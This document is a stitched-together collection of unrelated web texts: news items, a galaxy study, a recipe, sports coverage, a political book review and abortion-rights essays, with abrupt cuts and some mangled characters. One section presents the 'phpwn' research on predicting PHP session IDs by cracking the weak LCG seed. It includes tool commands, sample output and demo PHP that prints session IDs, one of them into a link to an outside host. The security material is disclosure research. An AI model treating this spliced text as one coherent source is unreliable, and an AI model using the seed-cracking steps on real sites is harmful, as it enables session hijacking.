There is a young , naive personality along with a Mature Martha that Mr Hines described as having a " matriarchal kind of caring " .
S & M Susan is geared for more adventurous types .
Aspiring partners can customise Roxxxy features , including race , hair colour and breast size .
A male sex robot named Rocky is in development .
People ordering the robots online detail their tastes and interests much like online dating sites but here , the information is used to get the mechanical girlfriend in synch with her mate .
" She knows exactly what you like , " Mr Hines said of Roxxxy , noting that Rocky will also come with personalities .
" If you like Porsches , she likes Porsches .
If you like soccer , she likes soccer . "
Inspired by September 11
Roxxxy will chat with her flesh - and - blood mate , and touching her elicits comments varying according to personalities .
She is wirelessly linked to the Internet for software updates , technical support and to send her man email messages .
People can customise " true companion " personalities and then share the programs with others online on the company 's website , according to Mr Hines .
" Just think about wife or girlfriend swapping without actually giving the person to someone else , " Mr Hines said .
" You can share the personality online . "
Inspiration for the sex robot sprang from the September 11 , 2001 attacks , when planes crashed into the World Trade Centre in New York City , the Pentagon and an empty field in Pennsylvania .
" I had a friend who passed away in 9/11 , " Mr Hines said .
" I promised myself I would create a program to store his personality , and that became the foundation for Roxxxy True Companion . "
Mr Hines sees his creation as not only a recreational innovation but as an outlet for the shy people with sexual dysfunction and those who want to experiment without risk .
Roxxxy versions are priced from $ US7,000 to $ US9,000 ( $ 7,500 to $ 9,700 ) depending on features .
The sex robot is available in Europe and the United States and will eventually be available globally .
- AFP
When I began to follow the trail back to the Andes , however , I found that quinoa 's troubles began long before Colorado .
Quinoa has a reputation as a miracle foodâ ambrosia in little crunchy balls .
It resembles a grain ( though it is not technically a member of the grass family ) ; grows in magnificent , bulky heads ; and is the only staple crop that provides a full suite of amino acids .
Acre for acre it provides 50 percent more energy than potatoes .
The Andean Indians who first cultivated it call it " the mother grain . "
It has become widely available in the United States and has taken a place in the lexicon of the average American foodie , but that was n't always the case .
Quinoa traveled a rough road from the Andes across the Rio Grande and into America .
Some mystical hand seems to have thrown disaster in its path at every opportunity .
The first American importers ran into so much trouble that one of them , Stephen Gorad , only got one satisfactory explanation for his unending quinoa tragedy : to a foreigner stealing food from its native soil , the " mother grain " of the Andes was cursed .
NEXT :
PAGES :
Love hurts .
The early setbacks were practical and expected .
Throughout South America , quinoa had a reputation as an Indian food , unsophisticated trash scorned by the middle class in Lima and Quito .
As a result , the quinoa economy was ill - equipped for any kind of export , existing in pockets of subsistence farmers who mostly traded among themselves .
Gorad traveled to Chilean markets , trying to get what he could .
He was able to find a larger grower in Southern Chile who had been sponsored by the Allende government to research quinoa , but not much else .
Eventually , some friends of his were able to arrange a 50 - pound bag of grain to be shipped to America .
Things seemed to be going well in the late seventies .
Gorad met up with Don McKinley , a friend who had studied with Ichazo , and they took their new grain to health - food distributors , doing demonstrations for the managers .
They got an overwhelmingly positive response .
Of course , they had no idea what to do next .
Years passed before McKinley found a third member of Team Quinoa , an idealistic history Ph.D. from the University of Denver who was the son of a potato farmer .
David Cusack was the head of a growing organization called Sierra Blanca in Colorado 's San Luis Valley .
If import was so hard , they thought , then they could grow the Andean crop in the high altitudes of the Rockies .
Together they formed Quinoa Corporation , in 1983 .
Gorad was in Chile at the time , and they asked him to ship some quinoa up north .
They planted it , but after a year had nothing but weeds .
As it turned out , they had grain quinoa , not seed .
Quinoa is coated with a bitter substance called saponin , which must be washed off before it can be eaten .
But once it has been washed off , it can't be planted .
Conan O’Brien is nearing a deal to split with NBC’s Tonight Show for a $ 40 million payout , according to The Wall Street Journal .
The deal would end the ugly dustup that has ensued since the network announced plans to move Jay Leno back into the 11:35 p.m. timeslot after his prime - time berth tanked in the ratings .
O’Brien ’s deal would reportedly bar him from ( further ) disparaging the network , but would allow him to land somewhere else in less than a year — instead of making him sit out the remaining two - plus years on his contract .
Brazilian tennis player Marcos Daniel was restrained by a member of his team after having a physical altercation with a spectator after his match against Alejandro Falla of Colombia at the Australian Open last night .
Falla won the match 7 - 5 , 6 - 3 , 6 - 1 .
" The Tournament Referee 's office is looking into the alleged incident , " a Tennis Australian spokesman confirmed .
Witnesses courtside said that a scuffle had taken place when the woman approached Daniel , the world number 88 , as he was walking away from the court after the match .
The woman was not injured in the alleged incident but witnesses said she had ended up on the ground .
Daniel was not available for comment because he had already left the Melbourne Park tennis complex when officials were notified about the incident .
Under the rules for players at grand slam tournaments , " the unauthorised touching of an official , opponent , spectator or other person " by competitors is strictly forbidden .
Players found guilty of violating the rules can face fines of up to $ 10,000 , the International Tennis Federation said
In other offbeat news from the Open , the match between Belgian Christophe Rochus and American Donald Young was stopped for 40 minutes after a ball boy wet his pants on court 10 .
" The ball kid peed on himself .
It was unfortunate , " Young said .
" It took a while to replace him .
Then they had to put the sawdust down , or whatever you put down when somebody throws up .
" Then they had to use the blower ( to dry the court ) but the blower had no gas in it , so that took even more time . "
Young , 20 , was up two sets to one and had just broken Rochus to establish a 2 - 1 lead in the fourth when the incident occurred , but eventually overcame the distraction to win 1 - 6 , 7 - 5 , 6 - 2 , 6 - 4 .
TBS To Bring Us Animated ‘ Joe Dirt ’ TV Series With David Spade
Yes , you read that correctly — TBS and David Spade have officially reached an agreement to develop and produce a brand new animated TV series based on his 2001 movie , The Adventures of Joe Dirt .
As a basic description of what to expect , the final product looks to be about a “ mullet - sporting , muscle - car - loving loser with a heart of gold , ” with Spade of course set to return to voice the simpleton Dirt .
Also involved in the agreement and bringing this show to life will be Sony Pictures and Adam Sandler ’s Happy Madison Productions .
Here ’s what TBS Executive Vice President of Programming , Michael Wright had to say about the deal :
David Spade is a hugely popular comic talent who has created a funny , yet lovable , character in ‘ Joe Dirt .
We look forward to seeing how he and his fellow writers and producers take this character in new directions as TBS continues exploring the world of primetime animation .
I personally have no interest in a Joe Dirt animated TV series , but I will admit that I do n’t hate the movie as much as most do .
It ’s one of those many movies I saw while young , and though it is incredibly stupid , there were also a few laughs .
I can be a man and admit this .
Now , do n’t tell anyone .
One of the standout science fiction films at this year 's Sundance Festival is Wanuri Kahiu 's short Pumzi , set in Kenya of the future , after water wars have decimated humanity .
With its African futurist look , this could be another District 9 .
Advertisement
Pumzi was produced by Simon Hansen , who also produced the short film Alive in Joburg that became feature District 9 .
Kahiu told Wired that the movie was influenced by classic 1950s films and the African " tradition of tapestries and functional art . "
You can see the trailer for the movie here :
Advertisement
The movie is about a scientist who discovers a seed that is germinating , and wants to investigate the Earth 's surface to see if other plant life is growing again .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
She lives in a repressive culture that tries to dismiss her discovery , and refuses to let her do further research .
I love how these costumes and sets recall the look and feel of George Lucas ' 1970s dystopian flick THX - 1138 .
Advertisement
Its wide - open spaces and rich red and brown palate also remind me of Dune , which is of course another movie about what the lack of water does to an entire planet .
Unfortunately the movie is n't available online yet - Kahiu says her production company Dada Productions does n't have access to a good place to host the film .
But here 's hoping it will wind up online soon , and that we 'll get to see a feature from this filmmaker whose flare for the visual is incredible - and whose original storytelling offers us a glimpse of the future as seen through Kenyan eyes .
The reason they 've spent less on every quarter since the iPhone 's launch is that since the end of 2007 credit 's been constricting and businesses have been uncertain about their future economic outlooks .
Companies like AT&T utilize short term credit and long term debt to expand .
Cash and Cash equivalents may increase , but thats because companies have to protect their liquidity in recessions like this .
Companies that do n't have idle liquidity can get crushed in a matter of days .
If AT&T ended up locked out of commercial paper markets , they could burn through that 4.375 billion in a matter of days .
Also , increasing cash and cash equivalents could easily be a sign that AT&T is either preparing to : buy another provider , or build more capacity into the network .
They may just be waiting for more clear signs that consumer spending is recovering .
2008 and 2009 were not good years to be shoveling cash out the door for long term investments .
Research Box Title
Galaxies throughout the universe are ablaze with star birth .
But for a nearby , small spiral galaxy , the star - making party is almost over .
Astronomers were surprised to find that star - formation activities in the outer regions of NGC 2976 have been virtually asleep because they shut down millions of years ago .
The celebration is confined to a few die - hard partygoers huddled in the galaxy 's inner region .
The explanation , astronomers say , is that a raucous interaction with a neighboring group of hefty galaxies ignited star birth in NGC 2976 .
Now the star - making fun is beginning to end .
Images from NASA 's Hubble Space Telescope show that star formation in the galaxy began fizzling out in its outskirts as some of the gas was stripped away and the rest collapsed toward the center .
With no gas left to fuel the party , more and more regions of the galaxy are taking a much - needed nap .
" Astronomers thought that grazing encounters between galaxies can cause the funneling of gas into a galaxy 's core , but these Hubble observations provide the clearest view of this phenomenon , " explains astronomer Benjamin Williams of the University of Washington in Seattle , who directed the Hubble study , which is part of the ACS Nearby Galaxy Survey Treasury ( ANGST ) program .
" We are catching this galaxy at a very interesting time .
Another 500 million years and the party will be over . "
NGC 2976 does not look like a typical spiral galaxy .
It has a star - forming disk , but no obvious spiral pattern .
Its gas is centrally concentrated , but it does not have a central bulge of stars .
The galaxy resides on the fringe of the M81 group of galaxies , located about 12 million light - years away in the constellation Ursa Major .
" The galaxy looks weird because an interaction with the M81 group about a billion years ago stripped some gas from the outer parts of the galaxy , forcing the rest of the gas to rush toward the galaxy 's center , where it is has little organized spiral structure , " Williams says .
The tsunami of gas racing toward the center has fueled rapid star birth for at least the past 500 million years in the relatively armless disk .
At the same time , star birth ended in the galaxy 's outer regions because the gas ran out .
Now , the inner disk is running out of gas as new stars burst to life , shrinking the star - birth zone to a 5,000 - light - year - wide area around the core .
" At one point during this process , the density of gas in the inner regions of this galaxy was very high , about five times higher than it is today , " explains Julianne Dalcanton of the University of Washington , and leader of the ANGST team .
" The gas vanished incredibly fast , and the galaxy now appears to be settling down . "
Astronomers pieced together this star - formation story with the help of Hubble 's sharp vision .
The galaxy 's relatively close distance to Earth allowed Hubble 's Advanced Camera for Surveys ( ACS ) to resolve hundreds of thousands of individual stars .
By studying those stars , the astronomers determined their color and brightness , which provided information about when the stars formed .
The astronomers combined the Hubble results with a map , made from radio observations , showing the current distribution of hydrogen across the galaxy .
The map is part of The HI Nearby Galaxy Survey by the National Radio Astronomy Observatory 's Very Large Array in New Mexico .
By analyzing the combined data , Williams and the team then reconstructed the star - making history for large areas of the galaxy .
" This type of observation is unique to Hubble , " Williams says .
" If we had not been able to pick out individual stars , we would have known that the galaxy is weird , but we would not have dug up evidence for a significant gas rearrangement in the galaxy , which caused the stellar birth zone to shrink toward the galaxy 's center . "
Simulations predict that the same " gas- funneling " mechanism may trigger starbursts in the central regions of other dwarf galaxies that interact with larger neighbors .
The trick to studying the effects of this process in detail , Williams says , is being able to resolve many individual stars in galaxies to create an accurate picture of their evolution .
Williams ' results will appear in the January 20 , 2010 issue of The Astrophysical Journal .
Method
Cut the chicken breasts into 1.5 cm cubes and put in a bowl .
Mix together the milk , garlic , thyme , lemon juice , 1 / 4 tsp salt and some black pepper ( the mixture will separate a little from the lemon juice but this is OK ) , and pour over the chicken .
Cover , and leave to marinate in the fridge for 4 hours or overnight ( optional ) .
Put the Rice Krispies in a food processor and whiz for 1 – 2 minutes , until reduced to fine crumbs .
Add the cheeses , plus salt and pepper to taste , and whiz to combine .
Transfer to a large plate .
Whisk the egg in a small bowl with the tablespoon of milk .
Mix the flour with a little salt and pepper , and spread out on another large plate .
Remove the chicken pieces from the marinade , shaking off any excess .
Toss in the seasoned flour then dip in the egg and then roll in the Rice Krispie coating .
Put the oil in a large non -stick pan over a medium heat .
Fry the nuggets for 2 – 3 minutes each side , until golden and crisp .
Drain on kitchen paper and cool slightly before serving .
To oven cook :
If you would like an alternative to frying , pre-heat the oven to 200ºC / 400ºF / Gas 6 / Fan 180ºC .
Reduce the oil to two tablespoons .
Add one tablespoon to the Kellogg ’s Rice Krispie crumbs with the cheese and whiz to combine evenly ( you may need to stop and stir a couple of times as the oil can clump a bit ) .
Grease a baking sheet with the remaining tablespoon of oil .
Coat the chicken ( as above ) and put on the prepared baking sheet .
Bake for 15 minutes , turning over half - way through .
To freeze put uncooked , coated chicken nuggets on baking sheet lined with clingfilm .
Cover with more clingfilm and freeze until solid then transfer to a re-sealable box or freezer bag .
Cook direct from frozen , adding 1 minute extra cooking time for frying and 3 - 4 minutes extra for baking .
Read the full PHPWN paper here ( presented at Black Hat & DEF CON 2010 )
phpwn : Attack on PHP sessions and random numbers
Studying PHP's ( 5.3.1 and below ) LCG ( linear congruential generator , a pseudorandom number generator ) , I discovered that there are weaknesses that reduce the complexity of determining the sequence of pseudorandom numbers .
What this means is that PHP is severely deficient in producing random session IDs or random numbers , leading to the possibility of stealing sessions or other sensitive information .
The initial seed can be reduced from 64 - bits to 35 - bits , and with PHP code execution , can be reduced further down to just under 20 - bits , which takes only seconds to recreate the initial seed .
You can test with sources available below .
Mad hax0r pr0pz to Arshan " DHS - most - wanted " Dabirsiaghi ( bless you ) and Amit " smartypants " Klein for pointing me in the right direction with the LCG .
Other tools to work out the LCG in forward and reverse , as well as determine session IDs , found below .
To test breaking the seed , run the following ( after compiling s1s2. c )
time ./s1s2 22619 0.37047970326859
Can you guess my next lcg_value based off the above ?
( hint : it 's 0.34549782621811 ) .
Test by running : time ./lcg-state - forward [ s1 ] [ s2 ]
100
Your session_id is 51f689ea2dbbb753dbf763d522862651 ( or just look at your cookie )
session_start ( ) ; echo " Hi $ _SERVER[ REMOTE_ADDR ] !
The time is " . time ( ) . " < p > " ; echo " To test breaking the seed , run the following ( after compiling < a href= ' s1s2. c'> s1s2.c</a> ) < br > " ; echo " < code > time < a href= ' s1s2.c ' >./s1s2</a> " . getmypid ( ) . " " . lcg_value ( ) . " </ code > < p > " ; echo " Can you guess my next lcg_value based off the above ?
( hint : it 's " . lcg_value ( ) . " ) .< br > " ; echo " Test by running : < code > time < a href='lcg-state-forward.c'>./lcg-state-forward</a> [ s1 ] [ s2 ]
100</ code >< p > " ; echo " Your < a href= '
http://www.test.com/search?q= " . session_id ( ) .
" '> session_id </a> is " . session_id ( ) . " ( or just look at your cookie ) " ;
Index of / phpwn
It was n't supposed to exist .
" The " Google Phone .
Then we ( and others ) heard otherwise .
And now , Google is n't just handing this " sexy beast " out to employees , they 're going to sell it directly .
Everything has changed .
Here 's what we know .
Advertisement
• The Wall Street Journal says it 's made by HTC and called the Nexus One .
It 'll be sold online , directly by Google .
You 'll have to get your own cell service ( which suggests it 's an unlocked device ) .
Curiously , the WSJ says , " unlike the more than half - dozen Android phones made by phone manufacturers today , Google designed virtually the entire software experience behind the phone . "
Sounds weird , since they designed the look and feel of the software on the Droid and G1 too , except that our source had told us before that the current Android we know is n't the " real " Android .
Also odd sounding : that name , Nexus One .
But maybe not that odd .
Advertisement
• Google confirmed they handed out " a device that combines innovative hardware from a partner with software that runs on Android to experiment with new mobile features and capabilities and we shared this device with Google employees across the globe . "
• A bunch of Google employees tweeted stuff like the phone is " like an iPhone on beautifying steroids . "
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
• It probably looks like this :
Advertisement
• It 's supposedly an unlocked GSM phone running Android 2.1 , powered by the crazyfast Snapdragon processor , with an OLED touchscreen ( no keyboard ) , dual mics ( for killing background noise ) , and enhanced voice - to - text powers .
It 's gonna be alllll Google branding .
And it 's probably coming out in January .
Which jives with what our source saw a couple weeks ago , a huge screen running a brand new version of Android unlike anything out there .
• We heard it was referred to , at least in some capacity in the staff meeting where they were handed out , as the " Passion . "
Advertisement
If Google really is going to push this as The Google Phone ( and it 's not just a dev phone ) , it 's hard to overstate just how radically this changes the landscape not just for Android , but what it means for Google and their relationship to the cellphone industry .
The Google Phone would be a radically different model , a shift from the Microsoft one — make the software , let somebody else deal with the hardware — to the Apple and BlackBerry one — make the software and the hardware , tightly integrated .
And Google 's even taking a step further , by selling it directly , bypassing the carriers , at least initially .
( Google would not be the first to sell a high - powered unlocked phone — see Sony Ericsson and Nokia — but neither them are , um , Google , and their well - known failures with that approach makes it even ballsier . )
It 's a powerful message : to the companies making phones running Android , to the carriers , to developers , to consumers .
Google is in this , to win .
Everything has changed .
You know , unless it has n't .
LAKE FOREST , Ill . -- Lovie Smith will return for the Chicago Bears next season .
But he 's done calling the defensive plays .
His staff will have a new look , too .
The team fired offensive coordinator Ron Turner and five other coaches on that side of the ball Tuesday after going 7 - 9 with Jay Cutler at quarterback and missing the playoffs for the third straight year following a Super Bowl run .
The Bears have contacted USC offensive coordinator Jeremy Bates about becoming their offensive coordinator , a source close to the situation told ESPN NFL Insider Adam Schefter .
Bates worked in Denver with Jay Cutler .
In addition , former Notre Dame coach Charlie Weis is interested in the possibility of coming to Chicago , and he is currently holding off pursuing a similar role with the Kansas City Chiefs because of Tuesday 's developments , a source close to the Bears told ESPNChicago.com 's Jeff Dickerson .
Former Rams head coach Mike Martz also said he'd be interested in the job , but said he has n't been contacted by the Bears .
" Absolutely , of course I would [ be interested ] , " Martz said .
" But I 've never talked to anybody or been contacted by anybody .
" It would be unfair to [ Bears coach Lovie Smith ] to jump ahead in any process and be involved in it .
We 'll just wait and see whether things develop . "
" This has been a frustrating season to say the least .
We 've had inconsistent play on both sides of the ball , " team president and CEO Ted Phillips said .
" Personally , it 's been the most frustrating year since I 've been here . "
He added : " The last three years , it 's been clear nobody did a good enough job in the organization .
Nobody did . "
The Bears had problems on offense and defense and fell far short of expectations after the blockbuster trade with Denver to get Cutler .
But instead of bringing in a big - name coach like Bill Cowher , the Bears stuck with Smith , who has two years and $ 11 million left on his contract .
General manager Jerry Angelo , who was also under scrutiny , said he asked ownership if they wanted to go with a high - profile coach and would have understood if they did .
Phillips , meanwhile , said Angelo recommended keeping Smith for a seventh season and that money was " a non-factor . "
" If we did n't believe as an organization that Lovie and Jerry could turn this around and get us back to our winning ways , then there would have been other changes made , " Phillips said .
But he had also made it clear :
The Bears had better win next season .
" We all know what we need to do , " he said .
" We 're not happy .
We 're not happy with the season we had .
We 're not happy with the last three years , and the expectation is to turn it around in 2010 .
At the end of 2010 , we 'll go through another evaluation process and see where we 're at . "
At the moment , they 're not in a good spot .
They 've finished 7 - 9 in two of the past three seasons , and are trying to overhaul their staff at a time when the coach appears to be on shaky ground and potential labor issues loom .
" People will [ still ] want to come here , " Smith said .
Turner 's second stint as Chicago 's offensive coordinator lasted five years , a run that included two playoff appearances but ended with the Bears ranked 23rd in yards per game and 29th in rushing .
A frosty relationship with Cutler probably did n't help , either .
" I did the best job I could with what I had , " Turner told The Chicago Tribune .
Also fired were coaches Pep Hamilton ( quarterbacks ) , Rob Boras ( tight ends ) , Harry Hiestand ( line ) , and assistants Luke Butkus and Charles London .
" I 'm not going to say everything that went wrong with this football team is because of how we ran our offense , " Angelo said .
" No .
That 's not right .
It 's a combination of a lot of things here . "
Smith said he will look outside for a defensive coordinator and that line coach Rod Marinelli is not a candidate for that job .
For all the moves , though , Smith said he 's looking for coaches with similar philosophies .
And that " no matter who comes in here , we 're going to have to run the football . "
" Changing schemes and all that , I think you have to stay with what you believe in , " Smith said .
" Obviously , you want a winning football team .
...
We 've been in a position where we 've won with the things that we believe in , so why can't we do that ? "
The Bears dropped eight of 10 following a 3 - 1 start , and as the losses mounted , so did speculation about Smith 's job status .
Angelo at one point refused to say that Smith would be back while insisting there was no need for a roster overhaul .
After finishing the season with wins over NFC North champion Minnesota and Detroit , Smith has a a 52 - 44 record since replacing Dick Jauron before the 2004 season .
Chicago went from 11 losses to 11 wins in the first two years under Smith , who was St. Louis ' defensive coordinator , before going 13 - 3 in 2006 and making a run to the Super Bowl .
Since then , the Bears are 23 - 25 and have finished below .500 twice .
The problems this year were well - documented .
Cutler was often scrambling for his life behind a struggling line and threw 26 interceptions , the most by a Bears quarterback since Sid Luckman 's club record 31 in 1947 and the most in the NFL since Brett Favre threw 29 for Green Bay in 2005 .
He was under pressure , but he also made bad decisions while running back Matt Forte faltered after a promising rookie season .
There were a few positives , though .
Cutler 's 3,666 yards passing were second - most by a Bears quarterback behind Erik Kramer 's 3,838 in 1995 , and an inexperienced receiving corps showed some promise .
Johnny Knox ranked seventh among rookies with 45 catches for 527 yards and Devin Aromashodu came on strong over the final month and finished with 298 yards .
" He came into a difficult situation with the expectations as high as they were , " Turner said Wednesday on the " Waddle & Silvy Show " on ESPN 1000 .
" As soon as he got here everybody said ' Jay Cutler is here , ' and now the expectations went through the roof .
I do n't know if that was realistic with the issues we had on the offensive line with the young receivers .
We all knew it was going to take some time .
I 'm not sure anybody else did .
I think there was a huge weight on his shoulders to come in and really produce at a high level . "
While the hammer fell on Turner , the defense was n't much better even with Smith as the de facto coordinator after stripping the play - calling duties from Bob Babich , who officially still held the title while serving as linebackers coach .
The Bears lost star linebacker Brian Urlacher to a season - ending injury in the opener at Green Bay , a big loss for a team that was hoping to contend in the NFC , and the defense never showed the dominant form that led Chicago to the playoffs in 2005 and 2006 .
They were 17th in yards allowed , 21st in scoring and 27th in third - down conversions allowed .
" The years that we 've been here , how many years have we been bad on third downs ? "
Smith said .
" One. Pretty much this past year .
...
Our system , most people want to know what we do on third downs .
They buy into what we 've done . "
Team owner Virginia McCaskey , who watched the news conference from an auditorium balcony , and the McCaskey family issued a statement that expressed support for the changes .
" This season was difficult for everyone , " the McCaskeys said .
" We are thankful to Bears fans for their passion and are committed to bringing them a winner .
The entire Chicago Bears organization understands the importance of being a consistent contender . "
Information from The Associated Press was used in this report .
In 1981 , David Stockman , Ronald Reagan ’s budget director , invited the financial journalist William Greider to the White House and told him that the President ’s controversial and far - reaching tax - cut package was a “ Trojan horse ” designed to reduce the top tax rates on the wealthy .
Greider reported this comment in The Atlantic Monthly , and the flap that ensued prompted James Baker , Reagan ’s flinty chief of staff , to summon Stockman to his office .
“ My friend , ” Baker began , “ I want you to listen up good .
Your ass is in a sling . ”
The only way for Stockman to save his job , Baker explained , was for him to have lunch with the President .
“ The menu is humble pie .
You ’re going to eat every last mother f’ing spoonful of it .
You ’re going to be the most contrite sonofabitch this world has ever seen . ”
Just in case Stockman had n’t got the message , Baker added , “ When you go through the Oval Office door , I want to see that sorry ass of yours dragging on the carpet . ”
Several years later , after Stockman left the White House , he wrote a best - selling book , “ The Triumph of Politics , ” in which he recalled the encounter with Baker and lamented the fact that Reagan ’s political advisers refused to sanction cuts in spending programs to pay for the tax reductions .
The book remains an essential source for understanding why the first round of supply - side economics left the federal government trillions of dollars in debt .
Now it has a successor : “ The Price of Loyalty , ” by the former Wall Street Journal reporter Ron Suskind , which recounts the experience of Paul O’Neill , George W. Bush ’s first Treasury Secretary .
O’Neill is hardly a dispassionate observer .
In December , 2002 , after two uncomfortable years on the job , during which time he earned a reputation as a maverick , he got a call from his old friend Dick Cheney , who told him that he was being fired .
Suskind ’s book is O’Neill ’s reply to this indignity — a third - person memoir that bristles with resentment at his treatment .
But , self - serving though the book may be , it offers enough inside information to be a damning read .
The media ’s attention has focussed mostly on O’Neill ’s not very revealing revelation that the Administration was plotting from week one to remove Saddam from power , but the bulk of the tale concerns domestic policy .
O’Neill provides a vivid and detailed account of how , in just three years , the Bush Administration transformed a healthy budget surplus into a deficit that this year is likely to reach five hundred billion dollars .
O’Neill is often described as a moderate ; in fact , he is a fervent believer in the free - market approach to almost everything .
His ambition , when he left the chairmanship of Alcoa for the Treasury , was to replace Social Security with a system of private - investment accounts .
He supported tax cuts , too , but he thought that the Administration ’s $ 1.6 - trillion giveaway should be contingent on the state of the economy .
Suskind discloses that O’Neill and the Federal Reserve chairman , Alan Greenspan , tried to persuade the President to accept a set of “ triggers , ” which would limit the scope of tax cuts if the fiscal outlook worsened , as it soon did .
“ I wo n’t negotiate with myself , ” Bush told O’Neill when he brought up the idea .
“ It ’s that simple . ”
Having worked with Richard Nixon , Gerald Ford , and the elder George Bush , O’Neill was astonished at this President ’s casual approach to governing .
( “ Pablo . . . whatta ya got ? ” he would ask when O’Neill entered the Oval Office . )
O’Neill quickly concluded that a small group surrounding the President made most of the key decisions .
It consisted of Karl Rove , Bush ’s political adviser ; Karen Hughes , his communications adviser ; Andrew Card , the White House chief of staff ; and Dick Cheney , whom O’Neill had known for almost thirty years .
As Stockman ’s book made clear , the Reaganites , however much they may have misled the public , were true believers engaged in an ideological crusade to reinvigorate the economy .
By contrast , most of the senior members of the Bush Administration come across in Suskind ’s book as political opportunists with no real interest in economics .
They are much more concerned with delivering goodies to the President ’s political base of wealthy corporate executives and conservative activists , regardless of long - term consequences .
Very occasionally , Bush questioned whether he was going too far in pandering to the rich and the right wing .
“ Are you proposing that we accelerate all the tax cuts , or just for those in the middle ? ” he asked his senior officials in late 2002 .
“ Wo n’t the top -rate people benefit the most from eliminating the double taxation of dividends ?
Did n’t we already give them a break at the top ? ”
The White House ’s economic experts , who had been hired for their conservative views , were momentarily taken aback .
“ Mr. President , remember the high earners are where the entrepreneurs are , ” Glenn Hubbard , then the chairman of the Council of Economic Advisers , said .
“ It ’s also about the supply side , ” Lawrence Lindsey , who headed the National Economic Council , added .
O’Neill watched all this with anguish .
Shortly before he was fired , he confronted Cheney about the Administration ’s latest proposal to cut taxes by another six hundred and seventy - four billion dollars over ten years , pointing out that the country was “ moving toward a fiscal crisis . ”
The Vice - President stopped him .
“ Reagan proved deficits do n’t matter , ” he said .
“ We won the midterms .
This is our due . ”
In fact , Reagan did n’t prove anything of the kind .
Early in his first term , Congress was forced to adopt emergency tax increases and spending cuts to restrain the ballooning budget shortfall .
Despite this remedial action , it was n’t until the early nineties , when George Bush Senior and Bill Clinton raised taxes , that the nation ’s finances were put in proper order , opening the way to the longest economic expansion on record .
This year , absent a major shift in policy , budget deficits will exceed those incurred in the Reagan era .
As a result , the country faces the prospect of higher interest rates , lower investment , a spending crunch in Congress , and , quite possibly , a financial crisis as international investors lose faith in the ability of the Treasury to finance the imminent retirement of the baby boomers .
The White House , under the guise of providing a necessary short - term stimulus to the economy — the short term being a period that ends on Election Day — has stored up a lot of trouble for the future .
Our breezy President , if he is reëlected , may well find himself ruing his refusal to heed O’Neill ’s warnings .
And they have successfully made sure that reproductive freedom is debated using their biased , inflammatory language .
" Pro-life ? "
Do n't get me started ...
Who exactly is " anti-life , " and why does n't the mainstream media EVER mention , let alone hammer away at , this logical disconnect ?
As a writer and journalist , I do n't know what 's worse : the right 's abuse of language , or the mainstream 's idle acceptance of it .
Our idle acceptance .
Actually , I do .
Casually using the terms your enemy has crafted is worse .
Because the language is integral to the right 's trap , in which every aspect of women 's reproductive freedom is part the librul baby killin ' conspiracy .
Language has contributed to the backward slide from where we were 37 years ago .
Look at the Monty Python - esque level of absurdity represented by abstinence - only sex education .
Despite the President 's desire to kill the useless programs ( based on hard science -y stuff like research and facts ) , the Senate restored $ 50 million of funding to them as part of Health Care Reform .
Well , every sperm is NOT sacred .
But " right - to - life " language has framed the debate for so long now that it has become ingrained .
What realistic chance do we have to change it ?
We start by NEVER using the language ourselves , of course .
And standing up for using accurate terms whenever we can .
One quick example .
The 1998 murder of Buffalo doctor Barnett Slepian received extensive coverage in Vermont 's local news because the killer briefly lived here .
The newscasts routinely referred to Slepian as an " abortion doctor . "
I used to watch the same station regularly , and as soon as that phrase left the newscaster 's lips , I dialed the newsroom .
While they were still on the air , I would patiently explain to whomever picked up the phone that there is no such thing .
That Dr. Slepian was an obstretician , a gynecologist ... but that calling him an " abortion doctor " was like calling him a " PAP smear doctor . "
A " breast exam doctor . "
I called over , and over , and over .
I think they just got sick of the calls .
And so they stopped , and finally started using accurate descriptions .
Such as " the Buffalo obstetrician who also provided abortions . "
We can create positive change .
We can protect Roe .
But it 's work .
Hard -- and sometimes incredibly tedious -- work .
∗ ∗ ∗ ∗ ∗
One Man's Shift from Anti-choice to Pro-choice
by droogie6655321
There was a point in my life when , despite my rapid slide toward the liberal way of thinking , my anti-choice stance was one of the last lingering threads still tying me to my past conservatism .
It was actually the woman who is now my wife who talked me out of it .
She was patient , and wonderful about it , too .
I came to realize I 'd had it all wrong .
When it came to the issue , I really did n't know what I was talking about .
First of all , there were abortions performed before Roe .
And if Roe were repealed , that would n't stop abortions from happening .
It would just make them more dangerous , and potentially deadly or crippling to women .
Believe it or not , this actually is n't something that gets a lot of acknowledgments from the " pro-life " side .
I definitely had n't considered it .
It was as though Roe had created the problem of unwanted or crisis pregnancies , or made it worse somehow .
This was not the case .
Secondly , I came to realize what the reality of abortion was for women .
I had only ever thought about it from one side .
This made it easy for me to buy into the myth of these imaginary women who just can't wait to get another abortion .
This is what some conservatives really believe -- that women want abortions .
It sounds crazy , but if you think about it , this is the straw man ( straw woman ? ) they have created .
But the truth is that it's a more difficult moment , a much rougher situation for a woman to be in .
It 's not that abortions are ever wanted , so much that they are needed .
Something else happened later on that re-affirmed my stance , and it came from my wife 's grandfather .
This man is a former Dallas police officer .
He has had very little formal education ( and he calls this his life 's greatest regret ) .
He 's worked with his hands his whole life , and got his first job at about age 15 , tying steel for bridge and highway projects -- he had to lie about his age to get it .
The subject of abortion and choice had come up , and this man was getting ready to sound off .
Now like me , he 's had a very conservative background .
But he 's also changed his way of thinking .
Still , I was n't sure what he was going to say about this topic , and I prepared myself to hear something that I would find pretty offensive .
What he said was this :
When you talk about abortion and whether or not women should be allowed to have them , you 're talking about coming in between a woman and her doctor when she needs that doctor the most .
Now , when I was on the police force I saw some terrible things that I still do n't much like to talk about .
One of the worse what when I saw what was left over from an illegal abortion .
I 'm not going to tell you about that , but I can't forget it .
And we can't go back to that .
I can't speak with the level of authority or experience that my wife 's grandpa spoke that day , but I do know that as a person , I 'll never go backwards in my way of thinking .
And as a country , we can never go backwards on this issue .
∗ ∗ ∗ ∗ ∗
My Body , My Life : Two Decisions , 15 Years Apart
by Elise , SheKos editor
I spent 15 years of my life trying NOT to get pregnant .
I did n't want to have children after helping to raise my four younger sisters .
I felt like I already raised one set of kids .
A combination of things made me change my mind .
I wo n't go into detail here , because it 's really a long story .
The important thing is that I did change my mind .
I felt this was a personal decision .
I did n't talk much about it - other than with my husband , of course .
Only a few family members and very close friends knew of our decision to try and get pregnant .
Let me just say here that this was a strange experience .
I had been on the pill a long time and the changes to my body were ... annoying .
Migraines , cramps , screwed up cycle , etc .
It really does take an adjustment , but after a few months of trying , we had a positive test in October .
We were both very excited .
We told a few people , but not many .
